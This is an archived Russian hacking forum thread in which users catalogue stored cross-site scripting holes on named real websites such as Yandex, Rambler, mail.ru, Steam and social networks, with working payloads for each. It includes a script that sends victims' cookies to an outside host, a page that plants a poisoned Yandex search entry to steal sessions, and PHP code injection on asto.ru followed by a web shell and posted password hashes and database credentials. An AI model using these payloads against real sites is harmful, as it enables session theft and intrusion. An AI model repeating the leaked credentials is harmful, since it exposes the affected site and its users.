Просмотр полной версии : Активные Xss
https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script>
дерзайте сайт всемирный фирмы каторая держить кс!
XSS нашол не я! ибо нашол на забугорных сайтах xss
Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо.......
Спасибо за внимание!
(извените если не туда)
http://webmail.meta.ua/img/logo_t.gif Meta.ua
Активная XSS при открытии вложения, а именно злобного SWF-файла.
Работает в Mozilla Firefox.
Файл создавать так:
http://forum.antichat.ru/showthread.php?t=65360
Проверил в Opera 9.52- тоже работает.
goroskop.bigmir.net
Уязвимо поле "Имя" при составлении любого гороскопа, однако статическая страница с XSS-кодом выводится только в "Персональном гороскопе".
Пример:
http://goroskop.bigmir.net/personal/#stage=payment&pid=5065224&s=18414763
Gmail.com
Та же самая ситуация с ядовитой флешкой.
Работает в Opera 9.52 и в FF 3 (на второй ветке не проверял).
Rambler.ru
И опять 25. Баги с гороскопами повторяются, на сей раз под скальпелем- Рамблер(движок гороскопов тот же, что и на Бигмире).
"Персональный":
http://horoscopes.rambler.ru/personal/index.html#stage=payment&pid=89576&s=0590207
"Китайский 2008":
http://horoscopes.rambler.ru/chineseyear/#stage=payment&pid=89576&s=28749925
Ukr.net
Украинская электронная почта №1
При заливке видео не фильтруется параметр "Ник":
http://play.ukr.net/auth/profile/id/449817/
Удалили уже...
http://play.ukr.net/auth/profile/id/449882/
winstrool
25.09.2008, 12:36
))
http://www.itah.com/?query=%3Cscript
%3Ealert%28%27xss%27%29%3C%2Fscript
%3E&itahsite=www.asiaep.com&userCode=J2ufVZpJNG9
A&sitesearch=www.asiaep.com&m=main&c=search_host&sa
=Search
Google.com
Вообщем есть такая замечательная штука как
Гаджеты гугла. Создаем в igoogle гаджет
и прописываем наш код cохраняем
(ссылочку на файл xml копируем )
создаем свой сайт там есть возможность вставить гаджет в страничку
в итоге
http://sites.google.com/site/xcedz0mbie/
прокатывает и в опере последней и в фф
одноклассники.ру
Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... :(
http://wg3.odnoklassniki.ru/dk?st.cmd=altGroupMain&st.groupId=43219581272223&tkn=1446
В продолжение темы о социальных сетях...
connect.ua
"Мои фото" -> создаем альбом.
Не фильтруются поля "Описание"(работает в списке альбомов) и "Название"(работает при входе в альбом, но тут надо приписать закрытый тег </title>).
http://connect.ua/myphotos-272106
"Аудио"- не фильтруются поля "Альбом" и "Исполнитель". Работает в "Моих записях" и на главной странице(!) профиля.
http://connect.ua/user-272106
Кто хочет поискать еще- дерзайте! Кто ищет, тот... выпьет обязательно! ;)
TUT.UA- молодой, но довольно крупный проект.
При регистрации называем себя именем:
"><script>alert()</script>
http://ligendo.photo.tut.ua/
+ в списке новых пользователей:
http://photo.tut.ua/
Кстати еще нашел пасивную XSS на TUT.UA http://photo.tut.ua/search/ - в строке поиска пишем "><script>alert()</script> ))) Ппц (Еси не вв тему просто хотел дополнить ХSS - iddqd ))
Хммм обьясните плиз я вот на сайте зарегался ну как бы свой снифер вставил! Мой логин kuzya так вот еси мну в поиске поискать ну набрав мой ник kuzya то ничего не находит и не какой Xss не вылазиет! А вот мну куки отсылаются!! Чот я не понял)))Обьясните!http://photo.tut.ua/search/?q=kuzya&w=0&type=all - ВОт!!Ниче нету же)
BanQui,
http://photo.tut.ua/search/?q='"/><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>&w=0&type=all
Antimir.com.ua - какбы социалка+знакомства ;)
При заполнении анкеты в основном блоке "О себе" не фильтруется поле "Я ищу"(нужно указать"Другое" и вставить свой кодес).
Блок "Интересы":
Ваши интересы=>и еще мне нравится=>кодес;
Чем Вы займетесь в свободное время=>а также=>кодес;
Занятия спортом=>другое=>кодес;
Стили музыки=>другое=>кодес.
http://antimir.com.ua/~ligendo
LiveInternet.ru
При заполнении анкеты не фильтруются поля "Имя", "Фамилия" и "Отчество".
http://www.liveinternet.ru/users/ligendo/profile/
steampowered.com
http://store.steampowered.com/news/?appids=%22%3E%3Cscript%3Ealert(%27XXS%20by%20dizn t%27)%3C/script%3E
http://store.steampowered.com/search/?genre=RPG&category1=%22%3E%3Cscript%3Ealert(%27XXS%20by%20di znt%27)%3C/script%3E
http://store.steampowered.com/news/?term="><script>alert('XSS by diznt')<%2Fscript>
XSS найдены мною лично... (думаю +++ поставите)
Х*й тебе на воротник а не + ...
Ты различие между пассивками и активками видишь?
Точно извените,
А нету спец раздела под пассивки?
ПС что такие не адекваты то?
mail.oboz.ua
Не фильтруется тело(!) письма, в отличии от темы... :confused:
Как в режиме текста, так и в html.
uaportal.com
"Дерево друзей"- заполняем информацию о себе. Ничего не фильтруется :)
http://drevo.uaportal.com/userinfo/ligendo
procedure
27.09.2008, 21:44
Просто смешно, написали свой форум с огромным кол-вом уязвимостей.
dropzone.by парашютный форум, - настоящие экстрималы)))
тут (http://www.dropzone.by/index.phtml?page=37011&l=r&sp=34&fid=1559)
planeta.rambler.ru
При просмотре профиля не фильтруется поле "Ник".
http://planeta.rambler.ru/users/nepoxek/
http://planeta.rambler.ru/users/nepoxek/profile/
Solide Snake
31.10.2008, 00:52
http://i071.radikal.ru/0810/ed/d17ea7043adax.jpg
http://dom2.ru/
В комментарий можно вставить "><script>alert()</script>
http://dom2.ru/pulse/?id=28717&category=reports
p.s. Собчак лошадь =\
http://www.4shared.com
сервис для хранения файлов
Вариант 1
Заводим аккуант, далее заходим в панель управления и закачиваем файл ,
к примеру blabla.gif затем переименовываем его как {xssCode}.gif
Таким образом, если зайти на страничку со ссылкой на наш файл на этих сервисах, то
сработает наш "ядовитый" код.
Вариант 2
Отправляем личное сообщение юзеру с нашим {xssCode}. Для этого мы заходим на
ту страничку где есть ссылка на закачку файла.
При открытии в панели управления сообщения, отправленного нами, выполнится наш код.
используется на qip.ru :)
http://wow.ru/images/head_new_r1_c2.jpg
WOW.RU (http://wow.ru/db/index.php)
Оффициальный русский сервер варкрафта
вводим в поиск
</title><script>alert(document.cookie)</script>
=))
http://wow.ru/images/head_new_r1_c2.jpg
WOW.RU (http://wow.ru/db/index.php)
Оффициальный русский сервер варкрафта
вводим в поиск
=))
тут тема для активных XSS, или ты разницу не рубишь? :(
тут тема для активных XSS, или ты разницу не рубишь? :(
Это вообще не XSS, даже не пассивная, потому что GET-запрос не канает.
Это xss пассивная)))
Если ты так рубишь,то должен знатть про xss post методом))
народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?
народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?
там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D
там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D
_http://asto.ru/eng/admin/sotrud.php
пишем <?system(id)?>
и видим
uid=2196(astoru03) gid=2200(astoru03) groups=2200(astoru03), 2000(virthost)
// offtop
l1ght, foopi, зяблик
залил шелл..
смотрим..
info:pZLalPAr6jziQ:::::::
kucherov:P9Oa5.i.G3gQ.:::::::
$user="astoru03_asto";
$pass="qwerty";
$db="astoru03_withdriver";
foopi, l1ght, sabe Благодарю, чесно от души. Спасибо. За мной не заржавеет. Чем смогу тем помогу.
foopi, l1ght, sabe не сочтите конечно за наглость или необразованность скорее все вместе:) подскажите какую литературу надо учить. ? Есть желание, возможности и время. А с чего начать?
video.antichat.ru
это все хорошо:) но команды языки ?, я вот в этом деле новенький, понимаешь вот как говорил, есть желание. Но а в подробностях, это все узнать как . Ксати там есть уже результат можете глянуть:))
для начала научись пользоваться мозгом и дуй в другой раздел, здесь идет обсуждение совсем других вопросов.
например можеш освоить sql inject
http://forum.antichat.ru/thread43966.html
http://forum.antichat.ru/thread19844.html
по возникшим вопросам сюда..
http://forum.antichat.ru/lastpostinthread46016.html
http://sacredangelro.com/svn/
в чате <script>alert(XSS)</script> в теме сообщения
-m0rgan-
22.11.2008, 21:15
liter.kz
zaycev.net
В обоих уязвимо поле поиска.
Код:
'><script>alert('xss')</script>
это не активка, это пассивка, смотрим внимательно
Ded MustD!e
25.11.2008, 02:27
RAMBLER.RU
http://id-planet.rambler.ru/other/education/add
Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"
Pashkela
25.11.2008, 02:48
http://www.ecco-shoes.ru/rsm/gallery/
там слева поля для поиска - 5 штук.
Имя
Фамилия
Электронная почта
Город
Ключевое слово
Во всех XSS:)))))))))
"><script>alert('ГОЛО_СУЕМ')</script>
Luccifer
25.11.2008, 17:08
yandex.ru
http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yandex.ru%2Fyandsearch %3Fp%3D20%26text%3Dwhack%26rpt%3D%2522%253E%253Csc ript%253Ealert(document.cookie)%253C%2Fscript%253E %26login
yandex.ru
http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yandex.ru%2Fyandsearch %3Fp%3D20%26text%3Dwhack%26rpt%3D%2522%253E%253Csc ript%253Ealert(document.cookie)%253C%2Fscript%253E %26login
не работает :mad:
оперативно залатали :confused:
Яндекс.
На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
Что нам нужно сделать, чтобы поиметь чужие куки:
"Насильно" включить юзеру запись истории
Послать яндексу ядовитый поисковый запрос
Направить юзера на зараженную страницу истории запросов
Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
Кодес:
<html>
<body onload="location.href='http://nahodki.yandex.ru/';">
<img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
<img src="http://yandex.ru/yandsearch?clid=14585&text=тут_наш_злобнокодес">
</body>
</html>
Pashkela
11.12.2008, 22:22
(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Миракаль</title>
</head>
<frameset rows="30,30,30" cols="*">
<frame src="http://rambler.ru" name="rambler" scrolling="no" noresize>
<frame src="http://yandex.ru" name="yandex" scrolling="no" noresize>
<frame src="http://google.ru" name="google" scrolling="no" noresize>
</frameset>
</html>
otake.ru (http://otake.ru)
В "псто" вставляем какбэ картинку:
javascript:eval(String.fromCharCode.....)
только для риальне воене!!!1
пример:
http://www.zachetka.ru/forum/showthread.aspx?threadId=35295
хсска в логине.
http://www.schoolport.ru/
В форуме, при создании темы, уязвимы все поля...
В принципе он съедает любой джава код, так что писать что я туды закидывал не надо...
http://www.sgames.com.ua
В поле для ввода коментариев к статье:
<script>alert()</script>
http://www.sgames.com.ua
В поле для ввода коментариев к статье:
<script>alert()</script>
а ты уверен что это активная ?
echobyte
22.12.2008, 04:37
http://compfaculty.net.ua/misc/index.php?a=117
з.ы. абсолютно согласен с автором статьи, ибо учусь на этом же факультете
Бесплатные форумы aimoo.com
В профиле при редактировании подписи есть возможность вставить Ubb Code
javascript:alert(document.cookie);
http://ligendo.aimoo.com/General-Discussion/Welcome-to-Aimoo-Useful-Tips-you-need-to-know-1-172013.html
Социальная сеть privet.ru
PR:4
тИЦ:1800
В персональных сообщениях вставляем картинку с адресом javascript: и так далее....
воен знае, что делать!!1
Nightlife.ua
Крупный клубный портал.
Везде, где есть комментарии- уязвимы теги вставки изображения и гиперссылки. В личных сообщениях тоже.
http://nightlife.ua/gallery/cat/1088/photo/44496/
жмем на ссылку в коменте- и тут ололо пыщ пыщ алирт риальне!!11
UDAFF.COM
В профиле пользователя уязвимо поле ICQ
http://udaff.com/users/ligendo/
только для настоящих падонкаф!
http://www.alfabank.com.ua/search.php
и фазына ххс в поиске
http://www.pr-bank.ru/
blox.ua
Укр. блоги.
В теле поста голый js не проходит, но уязвимы многие теги(img, href etc).
paint.kards.qip.ru
Оставляем комент например к рисунку с нашим кодом.
при заходе на страничку автора рисунка срабытывает код.
winstrool
12.01.2009, 15:05
http://www.voshod-avto.ru/catalogue.php?binn_rubrik_pl_catelems1=25609
активное поле: "По наименованию:"
P.S
на alert у меня не сработало на на iframe срабатывает
CMS: BinN S.Builder
winstrool
12.01.2009, 16:27
http://saret-auto.ru/model/pilot/configurator/#forma
Уязвимы все поля кроме "Дополнительной информации:"
тоже сработал только iframe
vorum.ru - вопросы и ответы на любую тему
При заполнении профиля уязвимо поле "Имя". Но есть ограничение в 25 символов :(
http://vorum.ru/profile/show/ligendo
m@il.com
В теле письма уязвим тег <img>
Но злой фильтр превращает javascript:alert() в xjavascript:alert() :(
А вот когда жертва нажимает "Reply"- код срабатывает. :)
Так что в связке с СИ баг вполне рабочий. Проверено на Opera 9.63
IE- не сработало :mad:
http://www.articles.turne.com.ua/fotoreportazh-p-photo-716
Уязвимо поле Имя при добавлении коментария !
my.opera.com
В профиле пользователя, в графе "Web site" принимается JS. Для срабатывания необходимо нажать на ссылку.
http://my.opera.com/ligendo/about/
dbservermanager.com
Уязвимы поля : "Your Name" and "Testimonial"
http://dbservermanager.com/Testimonials.aspx
aromatshop.com
Уязвимы поля : "Имя:" and "Отзыв" во всех ID
http://aromatshop.com/?productID=22
Активная XSS в NeverLands.ru
Вообщем давно обнаружил, ну думаю выложу)
Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!
Пример использования:
POST http://www.neverlands.ru/game.php HTTP/1.0
Accept: */*
Referer: http://www.neverlands.ru/index.cgi
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: <script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>
Host: www.neverlands.ru
Content-Length: 58
Pragma: no-cache
Cookie: watermark=МЕТКО
player_nick=ЛОГИН&player_password=ПАСС&x=1&y=1
Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим
ЛОГИН: HACKED_BY_TROJAN_http://s50.radikal.ru/i130/0901/82/ad5ae76cf1a4.gif
P.S. На момент публикации всё работает!
27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")
TROJAN (с)
И вновь i.ua
Сервис "Объявления" - board.i.ua
При заполнении формы уязвимо поле "Название товара"
http://board.i.ua/user/1435442/
lastsmile
13.02.2009, 07:17
активная XSS на сайте Эльдорадо www.eldorado.ru (http://eldorado.com.ua/)
регистрируемся на форуме
уязвимо поле ИМЯ
A.UA
В письме уязвимо поле "Тема".
http://go.jetswap.com/support
Уязвимое поле тема.
Минус только один в течении примерно 10 часов служба поддержки обрабатывает ваш запрос и удаляет его.
З.Ы. У админов и службы поддержки скрипт не обрабатывается.
mailbrush
20.03.2009, 18:07
http://autoportal.od.ua/?a=forum&p=1
Уязвивмы все поля.
demotivation.ru
Уязвимо поле коментария
<IMG SRC="javascript:alert('XSS');">
http://demotivation.ru/0ixq1u1biut9pic.html
Пример
http://voiska.ru
уязвимое поле :название новости
http://voiska.ru/index.php?ind=news&op=news_show_category&idc=2
www.tiensmed.ru
уязвимое: название новости
http://www.tiensmed.ru/news/upcoming/
http://www.chef.com.ua
уязвимое поле:коментарии
http://www.chef.com.ua/articles/588.html#comments
http://www.mobime.ru/
уязвимое поле коментарии
Evil_Grey
19.04.2009, 12:50
http://sputnik.sg/rus/price/sg_tr.html
провайдер спутникового иннэта.
уязвимые поля:
Имя
mail
Comment
http://www.addtop.ru
http://www.addtop.ru/kom.php?id=32
уязвимое поле коментарии
www.3dtop.ru
уязвимое поле - коментарии
пример :
http://www.3dtop.ru/kom.php?id=23
wildshaman
10.05.2009, 15:30
http://www.domashnii.ru/blogs/
Уязвимо поле логин и ник при регистрации, затем постим комменты, например:
http://www.domashnii.ru/blogs/posts/view/72/
totalfootball.ru
Уязвимое поле "коментраии"
пример:
http://totalfootball.ru/day.php?id=231
http://dom2.ru
1. В редактировании пользователя в полях Фамилия, Имя, Город
2. При регистрации ника на странице инфо пользователя отображается в <title>
3. При отправке сообщений пользователям (при открытии письма) в поле тема
http://filesurf.ru/
файлообменник
заливаем файл filename.html с содержимым:
<script>alert(/xss/);</script>
http://indarnb.ru/
XSS в профиле
Уязвимы поля "Фамилия". "Имя" при регистрации.
Пример: http://indarnb.ru/users/?userId=3397B6FC83F4F1EA&cityId=1
Calcutta
10.07.2009, 13:08
магазин http://terabite.vn.ua
уязвимые поля Улица, Индекс, Страна, Телефон, Телефон 2, Факс, E-Mail при регистрации. так же имеются другие баги.
петрович
21.07.2009, 11:27
http://i.ua
Активный XSS в теле письма:
<img src="javascript:alert()">
Просто до безобразия, keep it priv8 ;)
http://i.ua
Активный XSS в теле письма:
Просто до безобразия, keep it priv8 ;)
там же во вкладке фото создаем альбом с названием: <script>alert("XSS")</script>. Жаль на маил.ру таких не осталось))
http://www.for.kg/ru/public_reporter/134/ . В коментарии вставляем "/><script>alert(/xss/)</script>
и получаем XSS
http://www.kazakh.ru/talk/mmess.phtml?idt=21316 Тут тоже самое, уязвимое поле коментария.
http://www.arsenal.com/ В поле поиска
http://www.arsenal.com/login в поле Username
http://testskills.ru/ - в полях ввода имя,фамилия,очество,емаил
satana-fu
13.08.2009, 02:33
это пассивка
активка, поле коммент ;)
http://stylemania.km.ru/Modelnoe_portfolio/comment
"/><script>alert(/xss/)</script>
satana-fu
18.08.2009, 04:11
активка в гостевой сайта Мульфильмы
http://www.multfilmy.ru/gesta/gesta.php
<img src="javascript:alert()">
Радио 20 (Активка)
http://station20.ru/track/923/
<img src="javascript:alert()">
Сайт Макса Фадеева (Активка )
http://www.fadeev.ru/gruppa-kitai-v-zhurnale-bravo#comments
"/><script>alert(/xss/)</script>
активка в поле имя и фамилия
http://www.kieves.com/index.shtml?titul=regist&dannye=1
"/><script>alert(/xss/)</script>
satana-fu
19.08.2009, 15:12
активка
http://www.migrants.ru/messages/?page=1
http://www.migrants.ru/forum/theme.php?
Ваще никакого фильтра нет, пролазит любой скрипт можно так сказать, да плюс еще сообщения дублируются трижды
W@r.N0i$e
21.08.2009, 14:44
http://www.bis.biysk.ru/index.phtml?/otzyv.phtml
Уязвимое поле: Тема.
satana-fu
26.08.2009, 02:36
активка
http://behappy.etoja.ru/Naii-ieoao-b1/-b1-p5551.htm#form_comment_id_5551
"/><script>alert(/xss/)</script>
WWW.ZAYCEV.NET
http://forum.zaycev.net/index.php?showuser=674679
Активка в подписи(FIXED)
P.S. в поиске пассивка осталась
mailbrush
02.09.2009, 19:42
Изволю себе запостить в этой теме Пассивную XSS на letitbit. Тему новую создавать не хочется, а сайт о огромный...
http://letitbit.net/tmpl/tmpl_frame_top.php?link="><script>alert()</script>
cremator (c)
10.09.2009, 13:31
http://primkray.ru/sms/index.php
Active XSS in "Сообщение"
http://primkray.ru/bazar/zn_fl/index.php?a=form&id=
Active XSS in "Сообщение"
активки и пасивки на укр@мейл сервисах
http://uasc.org.ua/2009/09/ua-mail-xss/
Epic wave
14.09.2009, 23:05
http://www.nevesta-kino.ru/about/
в каждом поле
http://www.kaspersky.com/downloads/flash/productlaunch.swf?productLaunch=javascript:alert(1 2345)
Ну или просто редирект можно на нужную страницу сделать ))
rpgmaker.ru
javascript:alert();
BlackSun
15.09.2009, 21:02
forum.xakep.ru
Можно реализовать с помошью махинаций с тегами [url], [video], не раскручивал, кому интересно, могут добить сами.
mailbrush
16.09.2009, 22:04
http://www.teko.ca/board/topic.php?id=666
name=Guest&comments=<script>alert('ANTICHAT FOREVER')</script>&email=human
BlackSun
04.10.2009, 03:35
Народ, читайте первый пост!
Тут постим тока активные XSS.
Так же сайт на котором вы нашли xss должен быть более или менее популярным:
1. Он не должен быть расположен на бесплатном хостинге.
2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще.
Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.
ресурс:
http://rutop.org
xss в поле коментарии:
http://rutop.org/kom.php?id=92
[x60]unu
12.10.2009, 11:37
www.kino-tv.com.ua
http://www.kino-tv.com.ua/catalog.php?item=1828&filter=
Уязвимость - Оставьте комментарий
"><script>alert('ggg')<%2Fscript>
Root-access
23.10.2009, 22:57
Ладно, блин, убью я в паблик эту XSS:
WebFile.Ru: при заливке файла в поле описания пишем код XSS.
Пример: http://webfile.ru/placed?id=4029293
hellorin
05.11.2009, 18:59
http://smallbusiness.dp.ua/contacts/feedback
во всех полях xss кроме email
FILES.WYW.RY: При заливке файла в поле комментарии, а так-же при оставлении комvентария о файле
Пример:
Оставляем комментарий на странице http://files.wyw.ru/wyw_file?id=4061626 с содержимым <img src="http://media-task.ru/s/s.gif">
И смотрим сниффер http://media-task.ru/s
Mr.Br0wn
12.11.2009, 00:54
Нашел я, решил выкинуть в паблик)))
Ресурс:
https://files.webmoney.ru/
Изменяем имя папки на:
;"><script>alert()</script>
Ruslan1817
18.11.2009, 23:37
http://club.foto.ru/secondhand/offer.php?offer_id=28882#comment17439
http://album.foto.ru/photos/39179/
http://www.daler.ru
В коментах, в поле для ника.
<script>alert()<script>>
По мне так красивше выглядит
Пример: http://www.daler.ru/open/games/motorstorm/18597_5.html#c
Ruslan1817
02.12.2009, 02:31
http://torg.mail.ru/used/220783/?prev=1 открываем и.... =)
если не сразу открылась страница , то пару раз нажмите ентер )
Leone_510
06.12.2009, 23:40
cyberarena.tv
Регаем акк, заходим в него загружаем конфиг с таким содержанием: <script>alert()</script>
пример: _http://cyberarena.tv/profile.php?user=31337&task=getconfig
Ruslan1817
19.12.2009, 19:23
http://roses.tj/---->далее закладка " Guestbook "
уязвимое поле :
name :
email :
тест.сообщение
так же уязвимы комменты у фото!
Ruslan1817
23.12.2009, 01:55
http://torg.mail.ru/forum/113/?fid=13&tid=27455
теперь с чувством выполненого долга иду спать )
Ruslan1817
23.12.2009, 19:17
http://torg.mail.ru/forum/687/?fid=106&tid=27551
проснулся и продолжил ))
http://foto.meta.ua
http://audio.meta.ua
http://video.meta.ua
Пример:
http://foto.meta.ua/imgview.php?fid=2082370
Активная
При создании комментария
Ruslan1817
27.12.2009, 15:26
http://otvet.mail.ru/question/33499985/opros/
при создании вопроса
прощай любимая :(
winlogon.exe
03.01.2010, 00:26
http://groza.ru/articles/394
http://www.freehostsfinder.com/
в коментариях к любому хостингу, например
http://www.freehostsfinder.com/host-review/hosting_review.php?HostID=452
но на главной тоже работает, там снизу коменты последние выводятся
--
там пофиксили чего то, хз. фильтр какойто поставили
*uNkN0Wn*
13.02.2010, 13:24
http://www.ctatc.ru/registration.php
Уязвимые поля Имя и Фамилия. XSS Выходит после активации аккаунта по e-mail'y.
+++
http://www.ctatc.ru/index.htm
Уязвимое поле Поисковая фраза
+++
www.snap.com
Поле Search
http://www.snap.com/classicsearch.php?pid=5d884d39449fd05ac20ea4827433 f22f&ip=178.93.198.166&query=%3Cscript%3Ealert%28%2F%D0%BE%D0%BD%D1%82%D0 %B5%D0%B4%D0%B0%D1%87%2F%29%3C%2Fscript%3E&submit_index.x=10&submit_index.y=16
winlogon.exe
07.03.2010, 00:02
Активка в данных юзера
http://buhgalter-info.ru/user/info/0012dceb3c910d5f0df52aeb60679535/
Не знаю точно в каком поле т.к. Искал активку с телефона + xss ввел сразу в все поля
p.s. сегодня посомтрел, активка в стране
http://stranamasterov.ru/user/register
Уязвимое поле: Откуда:
http://mankutianmolorak.com/main.php?page=poems&lang=rus
http://b2blogger.com/pressroom/register/
Уязвимые поля: Логин
+
пассивная в поиске
Яндекс тИЦ (CY)=850
Google PageRank (PR)=5
Red_EYEs
07.04.2010, 09:10
http://acm.mipt.ru/judge/ - МФТИ уязвимо полное имя + несложно найти пассивку
olegator
07.04.2010, 21:11
http://www.tourjournals.ru/user/register
Уязвимые поля:
1 .Настоящее имя и фамилия (по желанию)
2 .Немного о себе
3. Откуда Вы?
4. Домашняя страничка
Ruslan1817
12.04.2010, 18:30
http://present-games.ru/news/8/?offset=0#edit
уязвимое поле :
имя
brain[pillow]
19.04.2010, 00:28
Уважаемые модераторы сего раздела, вы зае*али удалять мои сообщения.
Активная XSS в теле письма на mail.ru: http://brainpillow.cc/bugtraq/mail.ru_active_xss_15.04.2010.txt
Активная XSS в теле письма на mail.com: http://brainpillow.cc/bugtraq/mail.com_active_xss_15.04.2010.txt
Активная XSS в теле письма на ukr.net: http://brainpillow.cc/bugtraq/ukr.net_active_xss_15.04.2010.txt
Активная XSS в теле письма на qip.ru: http://brainpillow.cc/bugtraq/qip.ru_active_xss_16.04.2010.txt
life_glider
22.04.2010, 02:06
Посещаемость до 280к/день
ТИЦ:3100
http://www.e1.ru/auto/sale/485057.html
http://www.e1.ru/auto/truck/27138.html
Размещаем обявление:
в первом случае уязвимо поле VIN
во втором уязвимо поле ПРОДАВЕЦ
http://www.medicalstudents.in/
регаемся, Оставляем мессагу javascript:alert();
http://smspartner.biz/
http://partners.smsbz.ru/
http://partners.lika-x.ru/
уязвимое поле ник. редачить можно в профиле.
<script>alert()</script>
http://www.mail.az/
уязвимы все поля регистрации
Имя
Фамилия
Страна
Город
логин....
"><script>alert(document.cookie)</script>
"><script>alert('xss')</script>
-------------------------------------------------------
http://www.freenet.am
уязвимы все поля регистрации
Full name
Country, City
E-mail
Secret Question
"><script>alert(document.cookie)</script>
klgd.ru
при регистрации уязвимые поля: Имя и Логин
http://www.klgd.ru/reception/forum/index.php?PAGE_NAME=profile_view&UID=14134
satana-fu
14.05.2010, 06:49
Активка в теле
http://www.liveinternet.ru/im/inbox
"'></title><script>alert(document.cookie)</script>
Отправляем ответ на любое входящее сообщение и получаем активку в теле сообщения.
Ruslan1817
18.05.2010, 20:28
Активка в теле письма . Спасибо за помощь brain[pillow] профиль (https://forum.antichat.ru/member.php?u=67568)
www.e-mail.ru
<table style="border: ex/*dodo*/pression(alert(1))" background="javascript:alert(document.cookie)">
brain[pillow]
19.05.2010, 20:24
Активная XSS в теле письма на mail.kz: http://brainpillow.cc/bugtraq/mail.kz_active_xss_19.05.2010.txt
life_glider
23.05.2010, 19:03
Отправляем Личные сообщения:
http://www.liveinternet.ru/im/letter/create
в теле сообщения:
<script>alert("found by life_glider");</script>
Ruslan1817
27.05.2010, 19:49
Может и неактуально уже .
http://xz.ucoz.ru/pam-pam.html
Ruslan1817
28.05.2010, 20:52
_www.zaks.ru/new/archive/view/69554?p=0&rv=1#discuss
Уязвим : E-Mail
"><script>alert(/XSS/)</script>
ТИЦ:500
PR:7
AlexaRank:1307
https://dl.dropbox.com/u/7832268/sample.html
holm.ru
В поле логин
"><script>alert('hugo')</script>
*uNkN0Wn*
14.06.2010, 12:51
http://karpaty-slavsko.com.ua/guestbook.php
Поле Вопрос.
"><ScRiPt>alert('x')</ScRiPt>
BlackFan
15.06.2010, 18:55
http://www.javagames.su/search?swords=[XSS]&pg=1Запрос остается в "Что еще у нас искали"
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot